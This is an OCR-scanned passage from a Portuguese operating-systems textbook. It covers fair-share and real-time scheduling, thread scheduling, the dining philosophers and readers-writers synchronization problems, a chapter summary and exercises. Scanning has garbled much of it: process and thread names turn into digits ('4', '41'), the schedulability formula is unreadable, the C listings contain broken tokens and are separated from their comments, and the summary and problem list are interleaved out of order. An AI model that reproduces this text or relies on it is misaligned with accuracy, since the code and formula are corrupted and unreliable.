isto é, 10:20:25. 


Escalonamento por fração justa 


Até agora presumimos que cada processo é escalo- 
nado por si próprio, sem levar em consideração quem 
é o seu dono. Como resultado, se o usuário 1 inicia 
nove processos e o usuário 2 inicia um processo, com 
chaveamento circular ou com prioridades iguais, o 
usuário 1 receberá 90% da CPU e o usuário 2 apenas 
10% dela. 

Para evitar essa situação, alguns sistemas levam 
em conta qual usuário é dono de um processo antes de 
escaloná-lo. Nesse modelo, a cada usuário é alocada al- 
guma fração da CPU e o escalonador escolhe processos 
de uma maneira que garanta essa fração. Desse modo, 
se dois usuários têm cada um 50% da CPU prometidos, 
cada um receberá isso, não importa quantos processos 
eles tenham em existência. 

Como exemplo, considere um sistema com dois usu- 
ários, cada um tendo a promessa de 50% da CPU. O 
usuário 1 tem quatro processos, 4, B, Ce D, e o usuário 
2 tem apenas um processo, E. Se o escalonamento cir- 
cular for usado, uma sequência de escalonamento possi- 
vel que atende a todas as restrições é a seguinte: 


AEBECEDEAEBECEDE... 


Por outro lado, se o usuário 1 tem direito a duas ve- 
zes o tempo de CPU que o usuário 2, talvez tenhamos 


ABECDEABECDE... 


Existem numerosas outras possibilidades, é claro, e 
elas podem ser exploradas, dependendo de qual seja a 
noção de justiça. 
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2.4.4 Escalonamento em sistemas de tempo real 


Um sistema de tempo real é aquele em que o tem- 
po tem um papel essencial. Tipicamente, um ou mais 
dispositivos físicos externos ao computador geram estí- 
mulos, e o computador tem de reagir em conformidade 
dentro de um montante de tempo fixo. Por exemplo, o 
computador em um CD player recebe os bits à medida 
que eles saem do drive e deve convertê-los em música 
dentro de um intervalo muito estrito. Se o cálculo levar 
tempo demais, a música soará estranha. Outros siste- 
mas de tempo real estão monitorando pacientes em uma 
UTI, o piloto automático em um avião e o controle de 
robôs em uma fábrica automatizada. Em todos esses ca- 
sos, ter a resposta certa, mas tê-la tarde demais é muitas 
vezes tão ruim quanto não tê-la. 

Sistemas em tempo real são geralmente categoriza- 
dos como tempo real crítico, significando que há pra- 
zos absolutos que devem ser cumpridos — para valer! 
— e tempo real não crítico, significando que descum- 
prir um prazo ocasional é indesejável, mas mesmo as- 
sim tolerável. Em ambos os casos, o comportamento em 
tempo real é conseguido dividindo o programa em uma 
série de processos, cada um dos quais é previsível e co- 
nhecido antecipadamente. Esses processos geralmente 
têm vida curta e podem ser concluídos em bem menos 
de um segundo. Quando um evento externo é detecta- 
do, cabe ao escalonador programar os processos de uma 
maneira que todos os prazos sejam atendidos. 

Os eventos a que um sistema de tempo real talvez te- 
nha de responder podem ser categorizados ainda como 
periódicos (significando que eles ocorrem em interva- 
los regulares) ou aperiódicos (significando que eles 
ocorrem de maneira imprevisível). Um sistema pode ter 
de responder a múltiplos fluxos de eventos periódicos. 
Dependendo de quanto tempo cada evento exige para 
o processamento, tratar de todos talvez não seja nem 
possível. Por exemplo, se há m eventos periódicos e o 
evento i ocorre com o período P,e exige C, segundos 
de tempo da CPU para lidar com cada evento, então a 
carga só pode ser tratada se 


z G, 
Xp! 


Diz-se de um sistema de tempo real que atende a 
esse critério que ele é escalonavel. Isso significa que 
ele realmente pode ser implementado. Um processo que 
fracassa em atender esse teste não pode ser escalonado, 
pois o montante total de tempo de CPU que os proces- 
sos querem coletivamente é maior do que a CPU pode 
proporcionar. 
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Como exemplo, considere um sistema de tempo real 
não crítico com três eventos periódicos, com períodos de 
100, 200 e 500 ms, respectivamente. Se esses eventos exi- 
gem 50, 30 e 100 ms de tempo da CPU, respectivamente, 
o sistema é escalonavel, pois 0,5 + 0,15 + 0,2 < 1. Se um 
quarto evento com um período de 1 segundo é acrescen- 
tado, o sistema permanecerá escalonável desde que esse 
evento não precise de mais de 150 ms de tempo da CPU 
por evento. Implícito nesse cálculo está o pressuposto de 
que o overhead de chaveamento de contexto é tão peque- 
no que pode ser ignorado. 

Algoritmos de escalonamento de tempo real podem 
ser estáticos ou dinâmicos. Os primeiros tomam suas 
decisões de escalonamento antes de o sistema come- 
çar a ser executado. Os últimos tomam suas decisões 
no tempo de execução, após ela ter começado. O es- 
calonamento estático funciona apenas quando há uma 
informação perfeita disponível antecipadamente sobre 
o trabalho a ser feito, e os prazos que precisam ser cum- 
pridos. Algoritmos de escalonamento dinâmico não têm 
essas restrições. 


2.4.5 Política versus mecanismo 


Até o momento, presumimos tacitamente que todos 
os processos no sistema pertencem a usuários diferen- 
tes e estão, portanto, competindo pela CPU. Embora 
isso seja muitas vezes verdadeiro, às vezes acontece 
de um processo ter muitos filhos executando sob o seu 
controle. Por exemplo, um processo de sistema de ge- 
renciamento de banco de dados pode ter muitos filhos. 
Cada filho pode estar funcionando em uma solicitação 
diferente, ou cada um pode ter alguma função específi- 
ca para realizar (análise sintática de consultas, acesso 
ao disco etc.). É inteiramente possível que o principal 
processo tenha uma ideia excelente de qual dos filhos 
é o mais importante (ou tenha tempo crítico) e qual é o 
menos importante. Infelizmente, nenhum dos escalona- 
dores discutidos aceita qualquer entrada dos processos 
do usuário sobre decisões de escalonamento. Como re- 
sultado, o escalonador raramente faz a melhor escolha. 

A solução desse problema é separar o mecanismo 
de escalonamento da política de escalonamento, um 
princípio há muito estabelecido (LEVIN et al., 1975). O 
que isso significa é que o algoritmo de escalonamento 
é parametrizado de alguma maneira, mas os parâmetros 
podem estar preenchidos pelos processos dos usuários. 
Vamos considerar o exemplo do banco de dados nova- 
mente. Suponha que o núcleo utilize um algoritmo de 
escalonamento de prioridades, mas fornece uma chama- 
da de sistemas pela qual um processo pode estabelecer 


(e mudar) as prioridades dos seus filhos. Dessa maneira, 
o pai pode controlar como seus filhos são escalonados, 
mesmo que ele mesmo não realize o escalonamento. 
Aqui o mecanismo está no núcleo, mas a política é es- 
tabelecida por um processo do usuário. A separação do 
mecanismo de política é uma ideia fundamental. 


2.4.6 Escalonamento de threads 


Quando vários processos têm cada um múltiplos 
threads, temos dois níveis de paralelismo presentes: 
processos e threads. Escalonar nesses sistemas difere 
substancialmente, dependendo se os threads de usuário 
ou os threads de núcleo (ou ambos) recebem suporte. 

Vamos considerar primeiro os threads de usuário. 
Tendo em vista que o núcleo não tem ciência da existên- 
cia dos threads, ele opera como sempre fez, escolhendo 
um processo, digamos, 4, e dando a 4 controle de seu 
quantum. O escalonador de thread dentro de 4 decide 
qual thread executar, digamos, 41. Dado que não há in- 
terrupções de relógio para multiprogramar threads, esse 
thread pode continuar a ser executado por quanto tempo 
quiser. Se ele utilizar todo o quantum do processo, o 
núcleo selecionará outro processo para executar. 

Quando o processo 4, por fim, executar novamen- 
te, o thread 41 retomará a execução. Ele continuará a 
consumir todo o tempo de 4 até que termine. No en- 
tanto, seu comportamento antissocial não afetará outros 
processos. Eles receberão o que quer que o escalonador 
considere sua fração apropriada, não importa o que esti- 
ver acontecendo dentro do processo 4. 

Agora considere o caso em que os threads de 4 tenham 
relativamente pouco trabalho para fazer por surto de CPU, 
por exemplo, 5 ms de trabalho dentro de um quantum de 
50 ms. Em consequência, cada um executa por um tempo, 
então cede a CPU de volta para o escalonador de threads. 
Isso pode levar à sequência 41, 42, 43, Al, A2, A3, Al, A2, 
A3, Al, antes que o núcleo chaveie para o processo B. Essa 
situação está mostrada na Figura 2.44(a). 

O algoritmo de escalonamento usado pelo sistema de 
tempo de execução pode ser qualquer um dos descritos 
anteriormente. Na prática, o escalonamento circular e o 
de prioridade são os mais comuns. A única restrição é a 
ausência de um relógio para interromper um thread que 
esteja sendo executado há tempo demais. Visto que os 
threads cooperam, isso normalmente não é um problema. 

Agora considere a situação com threads de núcleo. 
Aqui o núcleo escolhe um thread em particular para execu- 
tar. Ele não precisa levar em conta a qual processo o thread 
pertence, porém ele pode, se assim o desejar. O thread 
recebe um quantum e é suspenso compulsoriamente se o 
exceder. Com um quantum de 50 ms, mas threads que são 


(a) Escalonamento possível de threads de 
usuário com quantum de processo de 50 ms e 
threads que executam 5 ms por surto de CPU. (b) 
Escalonamento possível de threads de núcleo com 
as mesmas características que (a). 


Processo A Processo B 


Ordem na 
qual os 


threads ~y 
executam 
2. O sistema 
supervisor 
seleciona INE E/N E 
um thread NA 


1. O núcleo seleciona 
um processo 
Possível: A1, A2, A3, A1, A2, A3 
Impossível: A1, B1, A2, B2, A3, B3 


(a) 





Processo A Processo B 


1. O núcleo seleciona E 
um thread 





Possível: A1, A2, A3, A1, A2, A3 
Também possível: A1, B1, A2, B2, A3, B3 


(b) 


bloqueados após 5 ms, a ordem do thread por algum pe- 
ríodo de 30 ms pode ser 41, B1, A2, B2, 43, B3, algo que 
não é possivel com esses parâmetros e threads de usuário. 
Essa situação está parcialmente descrita na Figura 2.44(b). 

Uma diferença importante entre threads de usuário 
e de núcleo é o desempenho. Realizar um chaveamento 
de thread com threads de usuário exige um punhado de 
instruções de máquina. Com threads de núcleo é neces- 
sário um chaveamento de contexto completo, mudar o 
mapa de memória e invalidar o cache, o que represen- 
ta uma demora de magnitude várias ordens maior. Por 
outro lado, com threads de núcleo, ter um bloqueio de 
thread na E/S não suspende todo o processo como ocor- 
re com threads de usuário. 

Visto que o núcleo sabe que chavear de um thread no 
processo 4 para um thread no processo B é mais caro do 
que executar um segundo thread no processo 4 (por ter 
de mudar o mapa de memória e invalidar a memória de 
cache), ele pode levar essa informação em conta quando 
toma uma decisão. Por exemplo, dados dois threads que 
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de outra forma são igualmente importantes, com um de- 
les pertencendo ao mesmo processo que um thread que 
foi bloqueado há pouco e outro pertencendo a um proces- 
so diferente, a preferência poderia ser dada ao primeiro. 

Outro fator importante é que os threads de usuário po- 
dem empregar um escalonador de thread específico de 
uma aplicação. Considere, por exemplo, o servidor na web 
da Figura 2.8. Suponha que um thread operário foi blo- 
queado há pouco e o thread despachante e dois threads 
operários estão prontos. Quem deve ser executado em se- 
guida? O sistema de tempo de execução, sabendo o que 
todos os threads fazem, pode facilmente escolher o despa- 
chante para ser executado em seguida, de maneira que ele 
possa colocar outro operário para executar. Essa estratégia 
maximiza o montante de paralelismo em um ambiente 
onde operários frequentemente são bloqueados pela E/S 
de disco. Com threads de núcleo, o núcleo jamais saberia 
o que cada thread fez (embora a eles pudessem ser atribuí- 
das prioridades diferentes). No geral, entretanto, escalona- 
dores de threads específicos de aplicações são capazes de 
ajustar uma aplicação melhor do que o núcleo. 


2.5 Problemas clássicos de IPC 


A literatura de sistemas operacionais está cheia de 
problemas interessantes que foram amplamente discu- 
tidos e analisados usando variados métodos de sincro- 
nização. Nas seções a seguir, examinaremos três dos 
problemas mais conhecidos. 


2.5.1 O problema do jantar dos filósofos 


Em 1965, Dijkstra formulou e então solucionou um 
problema de sincronização que ele chamou de problema 
do jantar dos filósofos. Desde então, todos os que inven- 
taram mais uma primitiva de sincronização sentiram-se 
obrigados a demonstrar quão maravilhosa é a nova primi- 
tiva exibindo quão elegantemente ela soluciona o proble- 
ma do jantar dos filósofos. O problema pode ser colocado 
de maneira bastante simples, como a seguir: cinco filóso- 
fos estão sentados em torno de uma mesa circular. Cada 
filósofo tem um prato de espaguete. O espaguete é tão 
escorregadio que um filósofo precisa de dois garfos para 
comê-lo. Entre cada par de pratos há um garfo. O dese- 
nho da mesa está ilustrado na Figura 2.45. 

A vida de um filósofo consiste em alternar períodos de 
alimentação e pensamento. (Trata-se de um tipo de abs- 
tração, mesmo para filósofos, mas as outras atividades 
são irrelevantes aqui.) Quando um filósofo fica suficien- 
temente faminto, ele tenta pegar seus garfos à esquerda 
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e à direita, um de cada vez, não importa a ordem. Se for 
bem-sucedido em pegar dois garfos, ele come por um 
tempo, então larga os garfos e continua a pensar. A ques- 
tão fundamental é: você consegue escrever um programa 
para cada filósofo que faça o que deve fazer e jamais fi- 
que travado? (Já foi apontado que a necessidade de dois 
garfos é de certa maneira artificial; talvez devamos trocar 
de um prato italiano para um chinês, substituindo o espa- 
guete por arroz e os garfos por pauzinhos.) 

A Figura 2.46 mostra a solução óbvia. O procedi- 
mento take fork espera até o garfo específico estar 
disponível e então o pega. Infelizmente, a solução 
óbvia está errada. Suponha que todos os cinco filóso- 
fos peguem seus garfos esquerdos simultaneamente. 
Nenhum será capaz de pegar seus garfos direitos, e 
haverá um impasse. 


Poderíamos facilmente modificar o programa de ma- 
neira que após pegar o garfo esquerdo, o programa confere 
para ver se o garfo direito está disponível. Se não estiver, 
o filósofo coloca de volta o esquerdo sobre a mesa, espe- 
ra por um tempo, e repete todo o processo. Essa proposta 
também fracassa, embora por uma razão diferente. Com 
um pouco de azar, todos os filósofos poderiam começar o 
algoritmo simultaneamente, pegando seus garfos esquer- 
dos, vendo que seus garfos direitos não estavam dispo- 
níveis, colocando seus garfos esquerdos de volta sobre a 
mesa, esperando, pegando seus garfos esquerdos de novo 
ao mesmo tempo, assim por diante, para sempre. Uma si- 
tuação como essa, na qual todos os programas continuam 
a executar indefinidamente, mas fracassam em realizar 
qualquer progresso, é chamada de inanição (starvation). 
(Ela é chamada de inanição mesmo quando o problema 
não ocorre em um restaurante italiano ou chinês.) 

Agora você pode pensar que se os filósofos simples- 
mente esperassem um tempo aleatório em vez de ao 
mesmo tempo fracassarem em conseguir o garfo direito, 
a chance de tudo continuar em um impasse mesmo por 
uma hora é muito pequena. Essa observação é verdadei- 
ra, e em quase todas as aplicações tentar mais tarde não 
é um problema. Por exemplo, na popular rede de área 
local Ethemet, se dois computadores enviam um pacote 
ao mesmo tempo, cada um espera um tempo aleatório e 
tenta de novo; na prática essa solução funciona bem. No 
entanto, em algumas aplicações você preferiria uma solu- 
ção que sempre funcionasse e não pudesse fracassar por 
uma série improvável de números aleatórios. Pense no 
controle de segurança em uma usina de energia nuclear. 

Uma melhoria para a Figura 2.46 que não apresen- 
ta impasse nem inanição é proteger os cinco comandos 
seguindo a chamada think com um semáforo binário. 
Antes de começar a pegar garfos, um filósofo realizaria 


geli: TEJ Uma não solução para o problema do jantar dos filósofos. 


#define N 5 


void philosopher(int i) 
{ 
while (TRUE) { 
think( ); 
take_fork(i); 
take_fork((i+1) % N); 
eat(); 
put. fork(i); 
put fork((i+1) % N); 


/* numero de filosofos */ 


/* i: numero do filosofo, de 0 a 4 */ 


/* o filosofo esta pensando */ 

/* pega o garfo esquerdo */ 

/* pega o garfo direito; % e o operador modulo */ 
/* hummm, espaguete */ 

/* devolve o garfo esquerdo a mesa */ 

/* devolve o garfo direito a mesa */ 


um down em mutex. Após substituir os garfos, ele rea- 
lizaria um up em mutex. Do ponto de vista teórico, essa 
solução é adequada. Do ponto de vista prático, ela tem 
um erro de desempenho: apenas um filósofo pode estar 
comendo a qualquer dado instante. Com cinco garfos 
disponíveis, deveríamos ser capazes de ter dois filóso- 
fos comendo ao mesmo tempo. 


[eU Uma solução para o problema do jantar dos filósofos. 
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A solução apresentada na Figura 2.47 é livre de im- 
passe e permite o máximo paralelismo para um núme- 
ro arbitrário de filósofos. Ela usa um arranjo, estado, 
para controlar se um filósofo está comendo, pensando, 
ou com fome (tentando conseguir garfos). Um filóso- 
fo pode passar para o estado comendo apenas se ne- 
nhum de seus vizinhos estiver comendo. Os vizinhos do 


#define N 5 /* numero de filosofos */ 


#define LEFT 
#define RIGHT 


+N-1)%N /* numero do vizinho a esquerda de i */ 
+1)%N /* numero do vizinho a direita de i */ 


#define HUNGRY 
#define EATING 


typedef int semaphore; 
int state[N]; 
semaphore mutex = 1; 
semaphore s[N]; 


(i 
(i 
#define THINKING 0 
1 
2 


void philosopher(int i) 


while (TRUE) { 
think(); 
take forks(i); 
eat(); 
put_forks(i); 


} 


void take. forks(int i) 

{ 
down(&mutex); 
state[i] = HUNGRY; 
test(i); 
up(&mutex); 
down(&sf[il); 

} 


void put_forks(i) 

{ 
down(&mutex); 
state[i] = THINKING; 
test(LEFT); 
test(RIGHT); 
up(&mutex); 

} 


/* o filosofo esta pensando */ 
/* o filosofo esta tentando pegar garfos */ 
/* o filosofo esta comendo */ 


/* semaforos sao um tipo especial de int */ 

/* arranjo para controlar o estado de cada um */ 
/* exclusao mutua para as regioes criticas */ 

/* um semaforo por filosofo */ 


/* i: o numero do filosofo, de O a N—1 */ 


/* repete para sempre */ 

/* o filosofo esta pensando */ 

/* pega dois garfos ou bloqueia */ 
/* hummm, espaguete! */ 

/* devolve os dois garfos a mesa */ 


/* i: o numero do filosofo, de O a N—1 */ 


/* entra na regiao critica */ 

/* registra que o filosofo esta faminto */ 

/* tenta pegar dois garfos */ 

/* sai da regiao critica */ 

/* bloqueia se os garfos nao foram pegos */ 


/* i: o numero do filosofo, de O a N—1 */ 


/* entra na regiao critica */ 

/* o filosofo acabou de comer */ 

/* ve se o vizinho da esquerda pode comer agora */ 
/* ve se o vizinho da direita pode comer agora */ 

/* sai da regiao critica */ 


void test(i)/* i: o numero do filosofo, de O a N—1 */ 


{ 


if (state[i] == HUNGRY && state[LEFT] != EATING && state[RIGHT] != EATING) { 


state[i] = EATING; 


up(&sli); 


118] | SISTEMAS OPERACIONAIS MODERNOS 


filósofo 7 são definidos pelas macros LEFT e RIGHT. 
Em outras palavras, se i é 2, LEFT é 1 e RIGHT é 3. 

O programa usa um conjunto de semáforos, um por 
filósofo, portanto os filósofos com fome podem ser blo- 
queados se os garfos necessários estiverem ocupados. 
Observe que cada processo executa a rotina philoso- 
pher como seu código principal, mas as outras rotinas, 
take forks, put forks e test, são rotinas ordinárias e não 
processos separados. 


2.5.2 O problema dos leitores e escritores 


O problema do jantar dos filósofos é útil para mo- 
delar processos que estão competindo pelo acesso ex- 
clusivo a um número limitado de recursos, como em 
dispositivos de E/S. Outro problema famoso é o proble- 
ma dos leitores e escritores (COURTOIS et al., 1971), 
que modela o acesso a um banco de dados. Imagine, por 
exemplo, um sistema de reservas de uma companhia 


aell: TPE] Uma solução para o problema dos leitores e escritores. 


typedef int semaphore; 
semaphore mutex = 1; 
semaphore db = 1; 

int rc = 0; 


void reader(void) 
{ 
while (TRUE) { 

down(&mutex); 
rc=rc +1; 
if (rc == 1) down(&db); 
up(&mutex); 
read data base(); 
down(&mutex); 
rc=1c—1; 
if (rc == 0) up(&db); 
up(&mutex); 
use data read(); 


void writer(void) 
{ 
while (TRUE) { 
think up data(); 
down(&db); 
write data base(); 
up(&db); 


aérea, com muitos processos competindo entre si dese- 
jando ler e escrever. É aceitável ter múltiplos proces- 
sos lendo o banco de dados ao mesmo tempo, mas se 
um processo está atualizando (escrevendo) o banco de 
dados, nenhum outro pode ter acesso, nem mesmo os 
leitores. A questão é: como programar leitores e escrito- 
res? Uma solução é mostrada na Figura 2.48. 

Nessa solução, para conseguir acesso ao banco de da- 
dos, o primeiro leitor realiza um down no semáforo db. 
Leitores subsequentes apenas incrementam um contador, 
rc. À medida que os leitores saem, eles decrementam o 
contador, e o último a deixar realiza um up no semáforo, 
permitindo que um escritor bloqueado, se houver, entre. 

A solução apresentada aqui contém implicitamente 
uma decisão sutil que vale observar. Suponha que en- 
quanto um leitor está usando o banco de dados, aparece 
outro leitor. Visto que ter dois leitores ao mesmo tempo 
não é um problema, o segundo leitor é admitido. Leitores 
adicionais também podem ser admitidos se aparecerem. 


/* use sua imaginacao */ 

/* controla o acesso a ‘rc’ */ 

/* controla o acesso a base de dados */ 

/* numero de processos lendo ou querendo ler */ 


/* repete para sempre */ 

/* obtem acesso exclusivo a ‘rc’ */ 
/* um leitor a mais agora */ 

/* se este for o primeiro leitor ... */ 
/* libera o acesso exclusivo a ‘rc’ */ 
/* acesso aos dados */ 

/* obtem acesso exclusivo a ‘rc’ */ 
/* um leitor a menos agora */ 

/* se este for o ultimo leitor ... */ 

/* libera o acesso exclusivo a ‘rc’ */ 
/* regiao nao critica */ 


/* repete para sempre */ 

/* regiao nao critica */ 

/* obtem acesso exclusivo */ 
/* atualiza os dados */ 

/* libera o acesso exclusivo */ 


Agora suponha que um escritor apareça. O escritor 
pode não ser admitido ao banco de dados, já que escritores 
precisam ter acesso exclusivo, então ele é suspenso. De- 
pois, leitores adicionais aparecem. Enquanto pelo menos 
um leitor ainda estiver ativo, leitores subsequentes serão 
admitidos. Como consequência dessa estratégia, enquanto 
houver uma oferta uniforme de leitores, todos eles entra- 
rão assim que chegarem. O escritor será mantido suspenso 
até que nenhum leitor esteja presente. Se um novo leitor 
aparecer, digamos, a cada 2 s, e cada leitor levar 5 s para 
realizar o seu trabalho, o escritor jamais entrará. 

Para evitar essa situação, o programa poderia ser es- 
crito de maneira ligeiramente diferente: quando um leitor 
chega e um escritor está esperando, o leitor é suspenso 
atrás do escritor em vez de ser admitido imediatamente. 
Dessa maneira, um escritor precisa esperar por leitores 
que estavam ativos quando ele chegou, mas não precisa 
esperar por leitores que chegaram depois dele. A desvan- 
tagem dessa solução é que ela alcança uma concorrência 
menor e assim tem um desempenho mais baixo. Courtois 
et al. (1971) apresentam uma solução que dá prioridade 
aos escritores. Para detalhes, consulte o artigo. 


2.6 Pesquisas sobre processos e threads 


No Capítulo 1, estudamos algumas das pesquisas atuais 
sobre a estrutura dos sistemas operacionais. Neste capítulo 
e nos subsequentes, estudaremos pesquisas mais especifi- 
cas, começando com processos. Como ficará claro com o 
tempo, alguns assuntos são muito menos controversos do 
que outros. A maioria das pesquisas tende a ser sobre os tó- 
picos novos, em vez daqueles que estão por aí há décadas. 

O conceito de um processo é um exemplo de algo 
que já está muito bem estabelecido. Quase todo sistema 
tem alguma noção de um processo como um contêiner 
para agrupar recursos relacionados como um espaço de 
endereçamento, threads, arquivos abertos, permissões 
de proteção e assim por diante. Sistemas diferentes rea- 
lizam o agrupamento de maneira ligeiramente diferente, 
mas trata-se apenas de diferenças de engenharia. A ideia 
básica não é mais muito controversa, e há pouca pesqui- 
sa nova sobre processos. 


2.7 Resumo 


A fim de esconder os efeitos de interrupções, os sis- 
temas operacionais fornecem um modelo conceitual que 
consiste de processos sequenciais executando em paralelo. 
Processos podem ser criados e terminados dinamicamente. 
Cada processo tem seu próprio espaço de endereçamento. 
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O conceito de threads é mais recente do que o de 
processos, mas ele, também, ja foi bastante estudado. 
Ainda assim, o estudo ocasional sobre threads apare- 
ce de tempos em tempos, como o estudo a respeito de 
aglomeração de threads em multiprocessadores (TAM 
et al., 2007), ou sobre quão bem os sistemas operacio- 
nais modernos como o Linux lidam com muitos threads 
e muitos núcleos (BOY D-WICKIZER, 2010). 

Uma área de pesquisa particularmente ativa lida 
com a gravação e a reprodução da execução de um 
processo (VIENNOT et al., 2013). A reprodução ajuda 
os desenvolvedores a procurar erros difíceis de serem 
encontrados e especialistas em segurança a investigar 
incidentes. 

De modo similar, muita pesquisa na comunidade de 
sistemas operacionais concentra-se hoje em questões 
de segurança. Muitos incidentes demonstraram que 
os usuários precisam de uma proteção melhor con- 
tra agressores (e, ocasionalmente, contra si mesmos). 
Uma abordagem é controlar e restringir com cuidado 
os fluxos de informação em um sistema operacional 
(GIFFIN et al., 2012). 

O escalonamento (tanto de uniprocessadores quan- 
to de multiprocessadores) ainda é um tópico que mora 
no coração de alguns pesquisadores. Alguns tópicos 
sendo pesquisados incluem o escalonamento de dis- 
positivos móveis em busca da eficiência energética 
(YUAN e NAHRSTEDT, 2006), escalonamento com 
tecnologia hyperthreading (BULPIN e PRATT, 2005) 
e escalonamento bias-aware (KOUFATY, 2010). Com 
cada vez mais computação em smartphones com res- 
trições de energia, alguns pesquisadores propõem 
migrar o processo para um servidor mais potente na 
nuvem, quando isso for útil (GORDON et al, 2012). 
No entanto, poucos projetistas de sistemas andam pre- 
ocupados com a falta de um algoritmo de escalona- 
mento de threads decente, então esse tipo de pesquisa 
parece ser mais um interesse de pesquisadores do que 
uma demanda de projetistas. Como um todo, proces- 
sos, threads e escalonamento, não são mais os tópicos 
quentes de pesquisa que já foram um dia. A pesquisa 
seguiu para tópicos como gerenciamento de energia, 
virtualização, nuvens e segurança. 


Para algumas aplicações é útil ter múltiplos threads 
de controle dentro de um único processo. Esses threads 
são escalonados independentemente e cada um tem sua 
própria pilha, mas todos os threads em um processo 
compartilham de um espaço de endereçamento comum. 
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Threads podem ser implementados no espaço do usuá- 
rio ou no núcleo. 

Processos podem comunicar-se uns com os outros 
usando primitivas de comunicação entre processos, por 
exemplo, semáforos, monitores ou mensagens. Essas 
primitivas são usadas para assegurar que jamais dois 
processos estejam em suas regiões críticas ao mesmo 
tempo, uma situação que leva ao caos. Um processo 
pode estar sendo executado, ser executável, ou bloquea- 
do, e pode mudar de estado quando ele ou outro execu- 
tar uma das primitivas de comunicação entre processos. 
A comunicação entre threads é similar. 

Primitivas de comunicação entre processos po- 
dem ser usadas para solucionar problemas como o 


PROBLEMAS 


1. Na Figura 2.2, são mostrados três estados de processos. 
Na teoria, com três estados, poderia haver seis transições, 
duas para cada. No entanto, apenas quatro transições são 
mostradas. Existe alguma circunstância na qual uma delas 
ou ambas as transições perdidas possam ocorrer? 

2. Suponha que você fosse projetar uma arquitetura de 
computador avançada que realizasse chaveamento de 
processos em hardware, em vez de interrupções. De qual 
informação a CPU precisaria? Descreva como o proces- 
so de chaveamento por hardware poderia funcionar. 

3. Em todos os computadores atuais, pelo menos parte dos 
tratadores de interrupções é escrita em linguagem de 
montagem. Por quê? 

4. Quando uma interrupção ou uma chamada de sistema 
transfere controle para o sistema operacional, geralmen- 
te uma área da pilha do núcleo separada da pilha do pro- 
cesso interrompido é usada. Por quê? 

5. Um sistema computacional tem espaço suficiente para 
conter cinco programas em sua memória principal. Es- 
ses programas estão ociosos esperando por E/S metade 
do tempo. Qual fração do tempo da CPU é desperdiçada? 

6. Um computador tem 4 GB de RAM da qual o sistema 
operacional ocupa 512 MB. Os processos ocupam 256 
MB cada (para simplificar) e têm as mesmas caracteris- 
ticas. Se a meta é a utilização de 99% da CPU, qual é a 
espera de E/S maxima que pode ser tolerada? 

7. Múltiplas tarefas podem ser executadas em paralelo e 
terminar mais rápido do que se forem executadas de 
modo sequencial. Suponha que duas tarefas, cada uma 
precisando de 20 minutos de tempo da CPU, iniciassem 
simultaneamente. Quanto tempo a última levará para 
completar se forem executadas sequencialmente? Quan- 
to tempo se forem executadas em paralelo? Presuma 
uma espera de E/S de 50%. 


produtor-consumidor, o jantar dos filósofos e leitor-es- 
critor. Mesmo com essas primitivas, é preciso cuidado 
para evitar erros e impasses. 

Um número considerável de algoritmos de escalona- 
mento foi estudado. Alguns deles são usados fundamen- 
talmente por sistemas em lote, como o escalonamento 
da tarefa mais curta primeiro. Outros são comuns tan- 
to nos sistema em lote quanto nos sistemas interativos. 
Esses algoritmos incluem escalonamento circular, por 
prioridade, de múltiplas filas, garantido, de loteria e por 
fração justa. Alguns sistemas fazem uma separação cla- 
ra entre o mecanismo de escalonamento e a política de 
escalonamento, o que permite que os usuários tenham 
controle do algoritmo de escalonamento. 


8. Considere um sistema multiprogramado com grau de 6 
(isto é, seis programas na memória ao mesmo tempo). 
Presuma que cada processo passe 40% do seu tempo es- 
perando pelo dispositivo de E/S. Qual será a utilização 
da CPU? 

9. Presuma que você esteja tentando baixar um arquivo 
grande de 2 GB da internet. O arquivo está disponível 
a partir de um conjunto de servidores espelho, cada um 
deles capaz de fornecer um subconjunto dos bytes do ar- 
quivo; presuma que uma determinada solicitação especi- 
fique os bytes de início e fim do arquivo. Explique como 
você poderia usar os threads para melhorar o tempo de 
download. 

10. No texto foi afirmado que o modelo da Figura 2.11(a) 
não era adequado a um servidor de arquivos usando um 
cache na memória. Por que não? Será que cada processo 
poderia ter seu próprio cache? 

11. Se um processo multithread bifurca, um problema ocor- 
re se o filho recebe cópias de todos os threads do pai. 
Suponha que um dos threads originais estivesse espe- 
rando por entradas do teclado. Agora dois threads estão 
esperando por entradas do teclado, um em cada proces- 
so. Esse problema ocorre alguma vez em processos de 
thread único? 

12. Um servidor web multithread é mostrado na Figura 2.8. 
Se a única maneira de ler de um arquivo é a chamada de 
sistema read com bloqueio normal, você acredita que 
threads de usuário ou threads de núcleo estão sendo usa- 
dos para o servidor web? Por qué? 

13. No texto, descrevemos um servidor web multithread, 
mostrando por que ele é melhor do que um servidor de 
thread unico e um servidor de maquina de estado finito. 
Existe alguma circunstancia na qual um servidor de thread 
unico possa ser melhor? Dé um exemplo. 


14. 


15. 


16. 


17. 


18. 


19. 


20. 


21. 


22. 


23. 


Na Figura 2.12, o conjunto de registradores é listado 
como um item por thread em vez de por processo. Por 
quê? Afinal de contas, a máquina tem apenas um conjun- 
to de registradores. 

Por que um thread em algum momento abriria mão vo- 
luntariamente da CPU chamando thread yield? Afinal, 
visto que não há uma interrupção periódica de relógio, 
ele talvez jamais receba a CPU de volta. 

É possível que um thread seja antecipado por uma inter- 
rupção de relógio? Se a resposta for afirmativa, em quais 
circunstâncias? 

Neste problema, você deve comparar a leitura de um ar- 
quivo usando um servidor de arquivos de um thread úni- 
co e um servidor com múltiplos threads. São necessários 
12 ms para obter uma requisição de trabalho, despachá- 
-la e realizar o resto do processamento, presumindo que 
os dados necessários estejam na cache de blocos. Se uma 
operação de disco for necessária, como é o caso em um 
terço das vezes, 75 ms adicionais são necessários, tempo 
em que o thread repousa. Quantas requisições/segundo 
o servidor consegue lidar se ele tiver um único thread? E 
se ele for multithread? 

Qual é a maior vantagem de se implementar threads no 
espaço de usuário? Qual é a maior desvantagem? 

Na Figura 2.15 as criações dos thread e mensagens im- 
pressas pelos threads são intercaladas ao acaso. Existe 
alguma maneira de se forçar que a ordem seja estrita- 
mente thread 1 criado, thread 1 imprime mensagem, 
thread 1 sai, thread 2 criado, thread 2 imprime mensa- 
gem, thread 2 sai e assim por diante? Se a resposta for 
afirmativa, como? Se não, por que não? 

Na discussão sobre variáveis globais em threads, usa- 
mos uma rotina create global para alocar memória para 
um ponteiro para a variável, em vez de para a própria va- 
riável. Isso é essencial, ou as rotinas poderiam funcionar 
somente com os próprios valores? 

Considere um sistema no qual threads são implementa- 
dos inteiramente no espaço do usuário, com o sistema de 
tempo de execução sofrendo uma interrupção de relógio 
